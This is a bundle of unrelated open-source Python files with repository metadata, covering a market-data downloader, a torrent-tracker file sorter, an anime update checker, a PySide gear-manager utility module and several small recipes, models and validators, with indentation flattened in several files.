bar = CtaBarData()
bar.vtSymbol = symbol
bar.symbol = symbol
try:
bar.exchange = DATAYES_TO_VT_EXCHANGE.get(d.get('exchangeCD', ''), '')
bar.open = d.get('openPrice', 0)
bar.high = d.get('highestPrice', 0)
bar.low = d.get('lowestPrice', 0)
bar.close = d.get('closePrice', 0)
bar.date = today
bar.time = d.get('barTime', '')
bar.datetime = datetime.strptime(bar.date + ' ' + bar.time, '%Y%m%d %H:%M')
bar.volume = d.get('totalVolume', 0)
bar.openInterest = 0
except KeyError:
print d
flt = {'datetime': bar.datetime}
self.dbClient[MINUTE_DB_NAME][symbol].update_one(flt, {'$set':bar.__dict__}, upsert=True)
            print u'%s downloaded' %symbol
else:
            print u'Contract %s not found' %symbol
#----------------------------------------------------------------------
def downloadEquitySymbol(self, tradeDate=''):
"""下载所有股票的代码"""
if not tradeDate:
tradeDate = self.lastTradeDate()
self.dbClient[SETTING_DB_NAME]['EquitySymbol'].ensure_index([('symbol', pymongo.ASCENDING)],
unique=True)
path = 'api/market/getMktEqud.json'
params = {}
params['tradeDate'] = tradeDate
data = self.datayesClient.downloadData(path, params)
if data:
for d in data:
symbolDict = {}
symbolDict['symbol'] = d['ticker']
flt = {'symbol': d['ticker']}
self.dbClient[SETTING_DB_NAME]['EquitySymbol'].update_one(flt, {'$set':symbolDict},
upsert=True)
            print u'Equity symbols downloaded'
else:
            print u'Failed to download equity symbols'
#----------------------------------------------------------------------
def downloadEquityDailyBar(self, symbol):
"""
        Download daily bars for an equity; symbol is the stock code.
"""
        print u'Start downloading daily bars for %s' %symbol
        # Find the latest bar already stored in the database
cl = self.dbClient[DAILY_DB_NAME][symbol]
cx = cl.find(sort=[('datetime', pymongo.DESCENDING)])
if cx.count():
last = cx[0]
else:
last = ''
        # Start downloading the data
path = 'api/market/getMktEqud.json'
params = {}
params['ticker'] = symbol
if last:
params['beginDate'] = last['date']
data = self.datayesClient.downloadData(path, params)
if data:
            # Create a unique index on datetime
self.dbClient[DAILY_DB_NAME][symbol].ensure_index([('datetime', pymongo.ASCENDING)],
unique=True)
for d in data:
bar = CtaBarData()
bar.vtSymbol = symbol
bar.symbol = symbol
try:
bar.exchange = DATAYES_TO_VT_EXCHANGE.get(d.get('exchangeCD', ''), '')
bar.open = d.get('openPrice', 0)
bar.high = d.get('highestPrice', 0)
bar.low = d.get('lowestPrice', 0)
bar.close = d.get('closePrice', 0)
bar.date = d.get('tradeDate', '').replace('-', '')
bar.time = ''
bar.datetime = datetime.strptime(bar.date, '%Y%m%d')
bar.volume = d.get('turnoverVol', 0)
except KeyError:
print d
flt = {'datetime': bar.datetime}
self.dbClient[DAILY_DB_NAME][symbol].update_one(flt, {'$set':bar.__dict__}, upsert=True)
            print u'%s downloaded' %symbol
else:
            print u'Symbol %s not found' %symbol
#----------------------------------------------------------------------
def loadMcCsv(fileName, dbName, symbol):
"""将Multicharts导出的csv格式的历史数据插入到Mongo数据库中"""
import csv
start = time()
    print u'Start reading CSV file %s and inserting into %s.%s' %(fileName, dbName, symbol)
    # Select the collection and create a unique index
host, port, logging = loadMongoSetting()
client = pymongo.MongoClient(host, port)
collection = client[dbName][symbol]
collection.ensure_index([('datetime', pymongo.ASCENDING)], unique=True)
    # Read the data and insert it into the database
    reader = csv.DictReader(open(fileName, 'r'))
for d in reader:
bar = CtaBarData()
bar.vtSymbol = symbol
bar.symbol = symbol
bar.open = float(d['Open'])
bar.high = float(d['High'])
bar.low = float(d['Low'])
bar.close = float(d['Close'])
bar.date = datetime.strptime(d['Date'], '%Y/%m/%d').strftime('%Y%m%d')
bar.time = d['Time']
bar.datetime = datetime.strptime(bar.date + ' ' + bar.time, '%Y%m%d %H:%M:%S')
        bar.volume = float(d['TotalVolume'])    # cast: CSV fields are read as strings
flt = {'datetime': bar.datetime}
collection.update_one(flt, {'$set':bar.__dict__}, upsert=True)
print bar.date, bar.time
    print u'Insert finished, took %s seconds' % (time()-start)
if __name__ == '__main__':
    ## Simple test scripts can go here
from time import sleep
e = HistoryDataEngine()
sleep(1)
#e.downloadFuturesSymbol("20170303")
#e.downloadAllFuturesDailyBar()
#e.downloadEquityDailyBar('000001')
    # Import the bundled index-futures intraday minute-bar CSV into MongoDB;
    # takes about 3 minutes on the author's machine
loadMcCsv('IF0000_1min.csv', MINUTE_DB_NAME, 'IF0000')
|
zhengwsh/InplusTrader_Linux
|
InplusTrader/ctaAlgo/ctaHistoryData.py
|
Python
|
mit
| 14,272
|
class Field:
    def __init__(self, coords, radius):
        self.coords = coords    # an (x, y, z) tuple
        self.radius = radius

class AsteroidField(Field):
    pass

class MineField(Field):
    pass

class NavPoint:
    # The (0, 0, 0) default is a placeholder; the original sketch referenced
    # undefined names x, y, z here.
    def __init__(self, ships=(), fields=(), coords=(0, 0, 0), stealth_flag=0):
        self.ships = ships
        self.fields = fields
        self.coords = coords
        self.stealth_flag = stealth_flag

class FlightMission:
    def __init__(self, navpoints=(), navmap=None):
        self.navpoints = navpoints
        self.navmap = navmap
|
delMar43/wcmodtoolsources
|
WC1_clone/data_structures/FlightMission.py
|
Python
|
mit
| 481
|
import argparse
import sys
import os
import json
import math
import re
import datetime
import html
import subprocess
import requests
import appdirs
from ratelimit import *
__version__ = "0.1"
headers = {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) '\
                  'AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.79 '\
                  'Safari/535.11',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9'\
',*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate,sdch',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3'}
class GazelleSort:
class RequestException(BaseException):
pass
def __init__(self, configdir):
self.configfilepath = os.path.join(configdir, "config.json")
self.error = False
self.session = requests.Session()
self.session.headers.update(headers)
self.authkey = None
self.snatches = []
self.torrentdata = {}
# Check if config file exists. If not, create default file.
if not os.path.isfile(self.configfilepath):
print("ERROR:")
print("Config file not found at config path: %s" % self.configfilepath)
print("A default config has been put in the location. Please edit it to your liking before running again.")
with open(self.configfilepath, "w") as f:
defaultconfig = {
"url": "",
"username": "",
"password": "",
"torrentdir": "",
"destdirs": {
"flac24bit": "",
"flac": "",
"320": "",
"v0": "",
"v2": ""
},
"pattern": {
"string": "%(artist)s - %(album)s (%(year)s) [%(format)s]",
"variousartists": "Various Artists",
"artistjoiner": " & ",
"listindividualartists": 2
}
}
f.write(json.dumps(defaultconfig, indent=4, sort_keys=True))
self.error = True
return
else:
with open(self.configfilepath, "r") as f:
self.config = json.loads(f.read())
def __del__(self):
pass
def checkConfig(self):
"""Checks if all necessary config options are present"""
# Check if all required parameters exist
necessaryparams = [("url", str), ("username", str), ("password", str), ("torrentdir", str), ("destdirs", dict), ("pattern", dict)]
if not all(item in self.config for item in [x[0] for x in necessaryparams]):
print("ERROR:")
print("Required settings missing from config file:")
            for missing in [item[0] for item in necessaryparams if item[0] not in self.config]:
                print("    " + missing)
return False
# Check if all required parameters are of correct type
if any([not isinstance(self.config[x[0]], x[1]) for x in necessaryparams]):
print("ERROR:")
print("Entries from config have wrong type:")
for wrong in [x for x in necessaryparams if not isinstance(self.config[x[0]], x[1])]:
print(" Param: '%s' (%s) should be of type: %s" % (wrong[0], type(self.config[wrong[0]]), wrong[1]))
return False
return True
@rate_limited(0.5)
def login(self):
"""Login and store cookie"""
login = self.config["url"] + "/login.php"
payload = {'username': self.config["username"],
'password': self.config["password"],
'keeplogged': 1,
'login': 'Login'
}
response = self.session.post(login, data=payload)
return response.status_code
@rate_limited(0.5)
def logout(self):
logout = self.config["url"] + "/logout.php"
self.session.get(logout + "?auth=%s" % self.authkey)
@rate_limited(0.5)
def ajaxrequest(self, action, **kwargs):
"""API Request"""
ajax = self.config["url"] + "/ajax.php"
params = {"action": action}
params.update(kwargs)
if self.authkey is not None:
params["auth"] = self.authkey
response = self.session.get(ajax, params=params, allow_redirects=False)
try:
decoded = response.json() # Get JSON from response
if decoded["status"] == "success":
return decoded # If the api returns a success, return the entire api response
else: # Throw an exception if the api request itself is an error.
if "error" in decoded: # Check if there is an error message. Also redact the authkey for security reasons.
raise GazelleSort.RequestException("Request '%s' failed. Error: %s" % (re.sub("auth=[\da-fA-F]+", "auth=REDACTED", response.url), decoded["error"]))
else:
raise GazelleSort.RequestException("Request '%s' failed. No Error message was returned by API." % response.url)
except json.JSONDecodeError:
raise GazelleSort.RequestException("Request didn't return any JSON. HTTP status code: %s" % response.status_code)
@rate_limited(0.5)
def getSnatched(self):
"""Find all torrents user has snatched"""
torrents = self.config["url"] + "/torrents.php"
profile = self.ajaxrequest("user", id=self.userid)
pages = math.ceil(profile["response"]["community"]["seeding"] / 50)
print("Reading IDs of %s snatched torrents" % profile["response"]["community"]["seeding"])
@rate_limited(1)
def readPage(page):
r = self.session.get(torrents + "?type=seeding&page=%s&userid=%s" % (page + 1, self.userid))
matches = re.findall("torrents.php\?id=(?P<groupid>\d+)&torrentid=(?P<torrentid>\d+)", bytes.decode(r.content))
self.snatches += list(map(lambda x: (int(x[0]), int(x[1])), matches)) # convert list of tuples from string to int
for page in range(pages):
readPage(page)
def prepareDirs(self):
"""Check if destination folders exist, and create them if not"""
for format in self.config["destdirs"]:
if not os.path.isdir(self.config["destdirs"][format]):
print("Creating dir: %s" % self.config["destdirs"][format])
os.makedirs(self.config["destdirs"][format])
if not os.path.isdir(self.config["torrentdir"]):
raise Exception("Torrentdir (%s) doesn't exist or can't be accessed." % self.config["torrentdir"])
def printProgressBar(self, progress, length, heartbeat=False):
"""Print a progress bar"""
if heartbeat:
print("\r⚡[", end="")
else:
print("\r [", end="")
width = 1/length
for i in range(length):
fill = (progress - i*width) / width
if fill < 0:
print(" ", end="")
elif fill < 0.25:
print("▏", end="")
elif fill < 0.5:
print("▎", end="")
elif fill < 0.75:
print("▌", end="")
elif fill < 1.0:
print("▊", end="")
else:
print("█", end="")
print("]", end="", flush=True)
def scanTorrents(self):
"""Iterate through all torrents to fetch their data"""
print("Fetching data of snatched torrents via API.")
print("Due to rate limiting this will approximately take %s" % datetime.timedelta(seconds=len(self.snatches) * 2))
        for n, id in enumerate(self.snatches):
            self.printProgressBar(n / len(self.snatches), 40, bool(n % 2))
            self.torrentdata[id[1]] = self.ajaxrequest("torrent", id=id[1])["response"]
print("\nDone!")
def renderName(self, torrentdata):
"""Render name from supplied user settings"""
if len(torrentdata["group"]["musicInfo"]["artists"]) > self.config["pattern"]["listindividualartists"]:
artist = self.config["pattern"]["variousartists"]
else:
artist = self.config["pattern"]["artistjoiner"].join(sorted([artist["name"] for artist in torrentdata["group"]["musicInfo"]["artists"]]))
fileformat = torrentdata["torrent"]["format"]
formatdata = {
"artist": artist,
"album": torrentdata["group"]["name"],
"year": torrentdata["group"]["year"],
"format": fileformat
}
name = self.config["pattern"]["string"] % formatdata
return name
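    # Example (hypothetical data): with the default pattern
    # "%(artist)s - %(album)s (%(year)s) [%(format)s]", a two-artist FLAC
    # release would render as "Artist A & Artist B - Some Album (2015) [FLAC]".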
def processFiles(self):
for key in self.torrentdata:
torrentdata = self.torrentdata[key]
# Check format
format = torrentdata["torrent"]["format"]
desttype = None
if format == "": # Non-music download, skip
continue
elif format == "FLAC":
if torrentdata["torrent"]["encoding"] == "24bit Lossless":
desttype = "flac24bit"
else:
desttype = "flac"
elif format == "MP3":
pass # TODO: Detect mp3 types
if desttype in self.config["destdirs"]:
destdir = self.config["destdirs"][desttype]
olddir = os.path.join(self.config["torrentdir"], torrentdata["torrent"]["filePath"].replace("/", "\\/"))
newdir = os.path.join(destdir, self.renderName(torrentdata))
# Create directory in destination and create hardlink to files
subprocess.call(["cp", "-Rl", html.unescape(olddir), html.unescape(newdir)], stderr=subprocess.DEVNULL)
def run(self):
"""Run the sorter"""
# If there were any errors on initializing, quit.
if self.error:
return 1
# Check the loaded config
if not self.checkConfig():
return 1
# Login
logincode = self.login()
        if logincode != 200:
            print("ERROR:")
            print("Login request failed with code %s" % logincode)
            return 1
        # Check if the login actually succeeded
indexjson = self.ajaxrequest("index")
if indexjson and all([x in indexjson["response"] for x in ["authkey", "passkey", "id"]]):
self.authkey = indexjson["response"]["authkey"]
self.passkey = indexjson["response"]["passkey"]
self.userid = indexjson["response"]["id"]
# Fetch the group and torrent ids of all snatched torrents. This is redone on every program rerun,
# and not cached, as it is likely to change a lot. If you know of any way to get this information directly from
# the api, please drop me a message.
self.getSnatched()
# Prepare destination folders
self.prepareDirs()
# Scan torrents and check if they exist in torrentdir
self.scanTorrents()
# Proceed to process the files
self.processFiles()
self.logout()
return 0
if __name__ == "__main__":
appname = "GazelleSort"
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", type=str,
help="Override config directory, defaults to '%s'" % appdirs.user_config_dir(appname))
args = parser.parse_args()
# Store directory path
configdir = appdirs.user_config_dir(appname)
if args.config:
configdir = args.config
    # If the config directory doesn't exist, create it
if not os.path.isdir(configdir):
os.makedirs(configdir)
# Start Gazellesort
gs = GazelleSort(configdir)
sys.exit(gs.run())
|
DrLuke/GazelleSort
|
gazellesort.py
|
Python
|
mit
| 11,974
|
from pythonforandroid.recipe import PythonRecipe
class RequestsRecipe(PythonRecipe):
version = '2.13.0'
url = 'https://github.com/kennethreitz/requests/archive/v{version}.tar.gz'
depends = ['setuptools']
site_packages_name = 'requests'
call_hostpython_via_targetpython = False
recipe = RequestsRecipe()
|
kronenpj/python-for-android
|
pythonforandroid/recipes/requests/__init__.py
|
Python
|
mit
| 327
|
from nose.tools import assert_equal
from ..views.email import download, stringify
from .... import make
def test_download():
app = make()
with app.app_context():
r = download('https://yuno.yande.re/data/preview/d0/94/d094d41d27b75027c48986f1294b3f3a.jpg', 'https://yande.re/')
assert_equal(stringify(r.headers['Content-Type']), 'image/jpeg')
assert_equal(r.status, 200)
|
Answeror/torabot
|
torabot/mods/booru/test/test_download.py
|
Python
|
mit
| 404
|
import _plotly_utils.basevalidators
class SelectedpointsValidator(_plotly_utils.basevalidators.AnyValidator):
def __init__(
self, plotly_name="selectedpoints", parent_name="scatterpolar", **kwargs
):
super(SelectedpointsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "info"),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/scatterpolar/_selectedpoints.py
|
Python
|
mit
| 478
|
#!/usr/bin/python3
# coding: utf8
###########################################################
#
# anime-checker.py
#
# by Eason Chang <eason@easonchang.com>
#
# A python script to automatically check whether my favorite animes
# have updated and then send me an email to notify me.
#
# This script does a one-time check.
# This script should be set as a scheduled job by using crontab.
#
# Contains 2 config files:
# - .env : stores environment variables of my email addresses and
# password.
# - storage.json : stores a list of my favorite animes, including title,
# website url, and current episode number.
#
###########################################################
import logging
import jsonpickle
from os import path
from packages.gmail.mailClient import MailClient
# Set logging config
logging.basicConfig(level=logging.INFO, format='[%(levelname)s] %(message)s')
# Disable logging
logging.disable(logging.CRITICAL)
mailClient = MailClient()
def loadFile(filePath):
# Load list of my favorite animes from ./storage.json
file = open(filePath, 'r')
fileContent = file.read()
file.close()
content = jsonpickle.decode(fileContent)
return content
def performCheck(DMs):
hasDMUpdated = False
global mailClient
    for DM in DMs:
if DM.checkUpdate():
# this DM has been updated
# send email
DM.sendMail(mailClient)
# set flag to true
hasDMUpdated = True
return hasDMUpdated
def updateFile(filePath, content):
# Update episode numbers to ./storage.json
jsonpickle.set_encoder_options('simplejson', sort_keys=True, indent=4, ensure_ascii=False)
jsonpickle.set_encoder_options('json', sort_keys=True, indent=4, ensure_ascii=False)
jsonpickle.set_encoder_options('demjson', sort_keys=True, indent=4, ensure_ascii=False)
fileContent = jsonpickle.encode(content)
# fileContent = json.dumps(animes, indent=4, ensure_ascii=False)
file = open(filePath, 'w')
file.write(fileContent)
file.close()
def main():
DMs = None
filePath = path.join(path.dirname(__file__), 'storage.json')
DMs = loadFile(filePath)
hasDMUpdated = performCheck(DMs)
if hasDMUpdated:
updateFile(filePath, DMs)
print('File updated')
else:
        print('No anime updates yet')
if __name__ == '__main__':
main()
|
Kamigami55/anime-checker
|
main.py
|
Python
|
mit
| 2,465
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Check spelling of a file."""
import logging
# pyspell files
import utils
def check(text, vocabulary):
"""Check ``text`` for mistakes by using ``vocabulary``."""
pass
def main(input_file, vocabulary_file):
"""Automatically check and correct the spelling of a file."""
vocabulary = utils.read_vocabulary(vocabulary_file)
logging.info("Read %i words.", len(vocabulary))
text = utils.read_text(input_file)
check(text, vocabulary)
def get_parser():
"""Return the parser object for this script."""
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(description=__doc__,
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("-i", "--input", dest="input",
required=True,
help="input FILE",
metavar="FILE")
parser.add_argument("-v", "--vocabulary", dest="vocabulary_file",
required=True,
help="vocabulary file",
metavar="FILE")
return parser
if __name__ == "__main__":
args = get_parser().parse_args()
main(args.input, args.vocabulary_file)
|
MartinThoma/pyspell
|
pyspell/check.py
|
Python
|
mit
| 1,278
|
from persistence.models import BaseModel
from peewee import *
class Agent(BaseModel):
"""description of class"""
name = CharField(unique=True, null=True)
hostname = CharField(unique=True, null=True)
phonenumber = CharField(unique=True, null=True)
def as_dict(self):
c_timestamp = self.creation_timestamp.isoformat()
m_timestamp = self.modification_timestamp.isoformat()
return {
'id': self.get_id(),
'name': self.name,
'hostname': self.hostname,
'phonenumber': self.phonenumber,
'creation_timestamp': c_timestamp,
'modification_timestamp': m_timestamp
}
|
onnovalkering/sparql-over-sms
|
sos-service/src/persistence/models/agent.py
|
Python
|
mit
| 683
|
from PySide import QtGui, QtCore, QtSql
__updated__ = "2015-07-14 10:12:08"
# Display formats
dateDispFormat = 'M/d/yyyy'
disp_DateTime = 'M/d/yyyy h:mmap'
timeDispFormat = 'h:mmap'
# Internal formats
DB_Date = 'yyyy-MM-dd'
DB_Time = 'hh:mm:ss'
DB_DateTime = DB_Date + ' ' + DB_Time
# Scanner prefixes
scanPrefix = '%!#'
scanSuffix = scanPrefix[::-1]
# Message window text delay
messageDelay = 10000
# Standard messages
selectOne = '-- Select One --'
returnFor = 'OR return this gear for...'
noActiveMember = 'No member currently selected!!!'
noActiveGear = 'No gear currently selected!!!'
# Global widget grid spacing
layoutGridSpacing = 10
# Colors
color = {'white': QtCore.Qt.white,
'red': QtGui.QColor(225, 60, 60),
'yellow': QtCore.Qt.yellow,
'green': QtGui.QColor(66, 225, 61),
'gray': QtCore.Qt.gray,
'black': QtCore.Qt.black}
# Certifications in database
certifications = ['LeadSport', 'LeadTrad', 'LeadIce', 'KayakRoll']
class KeyPressEater(QtCore.QObject):
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.KeyPress:
            if event.key() == QtCore.Qt.Key_F6:    # 16777269: remap F6 to Escape
event.ignore()
event = QtGui.QKeyEvent(QtCore.QEvent.KeyPress, QtCore.Qt.Key_Escape, QtCore.Qt.NoModifier)
return QtCore.QObject.eventFilter(self, obj, event)
if event.key() == QtCore.Qt.Key_Backspace or event.key() == QtCore.Qt.Key_Delete:
self.parent().keyStrokeList = ''
# If the KeyPress event was a character key on the key board
elif event.text().strip():
scanner_just_finished = False
# Check to see if the prefix (or parts of it) are in text
prefix_len = len(scanPrefix)
for n in xrange(prefix_len):
if scanPrefix[:prefix_len - n] in self.parent().keyStrokeList + event.text():
self.parent().keyStrokeList += event.text().strip()
self.parent().scannerIsTyping = True
if scanSuffix in self.parent().keyStrokeList:
self.parent().scannerIsTyping = False
scanner_just_finished = True
gear_id = self.parent().keyStrokeList.strip(scanSuffix).strip()
self.parent().keyStrokeList = ''
self.parent().set_scanner_field(gear_id)
break
if self.parent().scannerIsTyping or scanner_just_finished:
event.accept()
return True
# standard event processing
return QtCore.QObject.eventFilter(self, obj, event)
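# Example: with scanPrefix '%!#' a scanner wraps gear IDs as '%!#1234#!%'
# (scanSuffix is the reversed prefix). Keystrokes are buffered while a prefix
# match is in progress; once the suffix arrives, set_scanner_field('1234') is
# called and normal key handling resumes ('1234' is an illustrative id).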
outDateCol = 3
dueDateCol = 4
class DateEditDelegate(QtGui.QStyledItemDelegate):
def createEditor(self, parent, option, index):
if index.column() == outDateCol or index.column() == dueDateCol:
editor = QtGui.QDateEdit(parent)
return editor
else:
return super(DateEditDelegate, self).createEditor(parent, option, index)
def setEditorData(self, date_edit, index):
if index.column() == outDateCol or index.column() == dueDateCol:
d = index.model().data(index, QtCore.Qt.EditRole)
date_edit.setCalendarPopup(True)
date_edit.setDate(d)
else:
return super(DateEditDelegate, self).setEditorData(date_edit, index)
def setModelData(self, date_edit, model, index):
if index.column() == dueDateCol:
d = convert_date('Qt2DB', date_edit.date())
model.setData(index, d, QtCore.Qt.EditRole)
else:
return super(DateEditDelegate, self).setModelData(date_edit, model, index)
def updateEditorGeometry(self, editor, option, index):
if index.column() == outDateCol or index.column() == dueDateCol:
editor.setGeometry(option.rect)
else:
return super(DateEditDelegate, self).updateEditorGeometry(editor, option, index)
# def displayText(self, value, locale):
#
# if locale.column() == outDateCol:
# pass
# else:
# return super(DateEditDelegate, self).displayText(value, locale)
class TransactionSqlModel(QtSql.QSqlRelationalTableModel):
def flags(self, index):
flags = super(TransactionSqlModel, self).flags(index)
if 0 <= index.column() < dueDateCol:
if flags & QtCore.Qt.ItemIsEditable:
flags ^= QtCore.Qt.ItemIsEditable
return flags
def data(self, index, role):
due_date = super(TransactionSqlModel, self).data(self.index(index.row(), dueDateCol), QtCore.Qt.DisplayRole)
due_date = QtCore.QDate.fromString(due_date, DB_Date)
if role == QtCore.Qt.BackgroundRole:
if QtCore.QDate.currentDate().daysTo(due_date) == 0: # Gear is due today
return QtGui.QBrush(QtGui.QColor(color['yellow']))
elif QtCore.QDate.currentDate().daysTo(due_date) < 0: # Gear is late
return QtGui.QBrush(QtGui.QColor(color['red']))
else: # Gear is not due yet
return QtGui.QBrush(QtGui.QColor(color['green']))
if role == QtCore.Qt.DisplayRole:
if index.column() == outDateCol:
d = super(TransactionSqlModel, self).data(index, role)
if d:
d = QtCore.QDateTime.fromString(d, DB_DateTime)
return d.toString(disp_DateTime)
# Set column 'dueDateCol' to a date edit field
if index.column() == dueDateCol:
d = super(TransactionSqlModel, self).data(index, role)
if d:
return convert_date('DB2Qt', d)
return super(TransactionSqlModel, self).data(index, role)
class QTableViewCustom(QtGui.QTableView):
def __init__(self, parent):
super(QTableViewCustom, self).__init__(parent)
self.parent = parent
# self.editCol = editCol
self.scannerIsTyping = False
self.keyStrokeList = ''
self.installEventFilter(KeyPressEater(self))
def set_scanner_field(self, gear_id):
self.parent.set_scanner_field(gear_id)
def make_line_edit(this, label_name, place_holder=None):
lab = QtGui.QLabel(label_name)
edit = QtGui.QLineEdit(this)
if place_holder:
edit.setPlaceholderText(place_holder)
return lab, edit
def make_line_edit_display_only():
line_edit = QtGui.QLineEdit(None)
line_edit.setFrame(False)
line_edit.setReadOnly(True)
line_edit.setFocusPolicy(QtCore.Qt.NoFocus)
line_edit.setAutoFillBackground(True)
return line_edit
def make_line_edit_combobox(this, line_label, line_placeholder, box_label):
# Search box
name_label, line_edit = make_line_edit(this, line_label, line_placeholder)
# Birthday display box
box_label = QtGui.QLabel(box_label)
box = QtGui.QComboBox()
box.setEditable(False)
box.setInsertPolicy(QtGui.QComboBox.InsertAlphabetically)
return name_label, line_edit, box_label, box
def address_layout(this, pre, address_label):
this.__dict__[pre + 'addrLab'] = QtGui.QLabel(address_label)
this.__dict__[pre + 'addrLab'].setAlignment(QtCore.Qt.AlignTop)
this.__dict__[pre + 'streetEdit'] = make_line_edit(this, 'Street', 'Street')[1]
this.__dict__[pre + 'cityEdit'] = make_line_edit(this, 'City', 'City')[1]
this.__dict__[pre + 'stateBox'] = QtGui.QComboBox()
this.__dict__[pre + 'zipEdit'] = make_line_edit(this, 'Zipcode', 'Zip')[1]
this.__dict__[pre + 'zipEdit'].setMaxLength(5)
states = ['AK', 'AL', 'AR', 'AZ', 'CA', 'CO', 'CT', 'DE', 'FL', 'GA',
'HI', 'IA', 'ID', 'IL', 'IN', 'KS', 'KY', 'LA', 'MA', 'MD',
'ME', 'MI', 'MN', 'MO', 'MS', 'MT', 'NC', 'ND', 'NE', 'NH',
'NJ', 'NM', 'NV', 'NY', 'OH', 'OK', 'OR', 'PA', 'RI', 'SC',
'SD', 'TN', 'TX', 'UT', 'VA', 'VT', 'WA', 'WI', 'WV', 'WY']
this.__dict__[pre + 'stateBox'].insertItem(0, '')
this.__dict__[pre + 'stateBox'].insertItems(1, states)
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.setColumnStretch(0, 1)
# Place the objects on the page
grid.addWidget(this.__dict__[pre + 'streetEdit'], 0, 0, 1, 3)
grid.addWidget(this.__dict__[pre + 'cityEdit'], 1, 0); grid.addWidget(this.__dict__[pre + 'stateBox'], 1, 1); grid.addWidget(this.__dict__[pre + 'zipEdit'], 1, 2)
return grid
def emergency_contact_layout(this, suff):
this.__dict__['emNameLab' + suff], this.__dict__['emNameEdit' + suff] = make_line_edit(this, 'Name', '')
this.__dict__['emRelatLab' + suff], this.__dict__['emRelaltEdit' + suff] = make_line_edit(this, 'Relation', '')
this.__dict__['emHPhoneLab' + suff], this.__dict__['emHPhoneEdit' + suff] = make_line_edit(this, 'H Phone', 'XXX-XXX-XXXX')
this.__dict__['emWPhoneLab' + suff], this.__dict__['emWPhoneEdit' + suff] = make_line_edit(this, 'W Phone', 'XXX-XXX-XXXX')
this.__dict__['emCPhoneLab' + suff], this.__dict__['emCPhoneEdit' + suff] = make_line_edit(this, 'C Phone', 'XXX-XXX-XXXX')
grid = QtGui.QGridLayout()
grid.setSpacing(10)
# Place the objects on the page
# addrLay = addressLayout(this, 'em' + suff, 'Address')
grid.addWidget(this.__dict__['emNameLab' + suff], 0, 0); grid.addWidget(this.__dict__['emNameEdit' + suff], 0, 1, 1, 3); grid.addWidget(this.__dict__['emRelatLab' + suff], 0, 4); grid.addWidget(this.__dict__['emRelaltEdit' + suff], 0, 5)
grid.addWidget(this.__dict__['emHPhoneLab' + suff], 1, 0); grid.addWidget(this.__dict__['emHPhoneEdit' + suff], 1, 1); grid.addWidget(this.__dict__['emWPhoneLab' + suff], 1, 2); grid.addWidget(this.__dict__['emWPhoneEdit' + suff], 1, 3); grid.addWidget(this.__dict__['emCPhoneLab' + suff], 1, 4); grid.addWidget(this.__dict__['emCPhoneEdit' + suff], 1, 5)
# grid.addWidget(this.__dict__['em' + suff + 'addrLab'], 2, 0); grid.addLayout(addrLay , 2, 1, 2, 5)
return grid
def certification_layout(this, lab, checkbox_only=False):
set_label = ''
for c in lab:
if c.isupper():
set_label += ' '
set_label += c
set_label = set_label.strip()
Ckbx = QtGui.QCheckBox(set_label)
if checkbox_only:
return Ckbx
date_edit = QtGui.QDateEdit(date=QtCore.QDate.currentDate())
date_edit.setDisabled(True)
vouched = QtGui.QLineEdit(this)
vouched.setCompleter(this.parent.memberNameComp)
vouched.setDisabled(True)
    return Ckbx, date_edit, vouched
def convert_date(conversion, input_date):
def DB2Qt(in_date):
return QtCore.QDate.fromString(in_date, DB_Date)
def DB2Disp(in_date):
return Qt2Disp(DB2Qt(in_date))
def Disp2DB(in_date):
return QtCore.QDate.fromString(in_date, dateDispFormat).toString(DB_Date)
def Disp2Qt(in_date):
return DB2Qt(Disp2DB(in_date))
def Qt2Disp(in_date):
return in_date.toString(dateDispFormat)
def Qt2DB(in_date):
return Disp2DB(Qt2Disp(in_date))
conversions = {'DB2Qt': DB2Qt,
'DB2Disp': DB2Disp,
'Disp2DB': Disp2DB,
'Disp2Qt': Disp2Qt,
'Qt2Disp': Qt2Disp,
'Qt2DB': Qt2DB}
if isinstance(input_date, list):
for n in xrange(len(input_date)):
input_date[n] = conversions[conversion](input_date[n])
else:
input_date = conversions[conversion](input_date)
return input_date
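# Usage sketch: convert_date('DB2Disp', '2015-07-14') -> '7/14/2015'; lists are
# converted element-wise, e.g.
# convert_date('Disp2DB', ['7/14/2015', '8/1/2015']) -> ['2015-07-14', '2015-08-01'].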
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def remove_duplicates(dup_list):
if not isinstance(dup_list, (list, set)):
raise ValueError
seen = set()
seen_add = seen.add
return [x for x in dup_list if x not in seen and not seen_add(x)]
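# Example: remove_duplicates(['b', 'a', 'b', 'c']) -> ['b', 'a', 'c']
# (first occurrences win; order is preserved).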
def sort_list(list_to_sort):
# Remove duplicates
list_to_sort = list(set(list_to_sort))
# Sort the list case insensitively
list_to_sort = sorted(list_to_sort, key=lambda s: s.lower())
return list_to_sort
|
galbrads/Gear_Manager
|
Util.py
|
Python
|
mit
| 12,446
|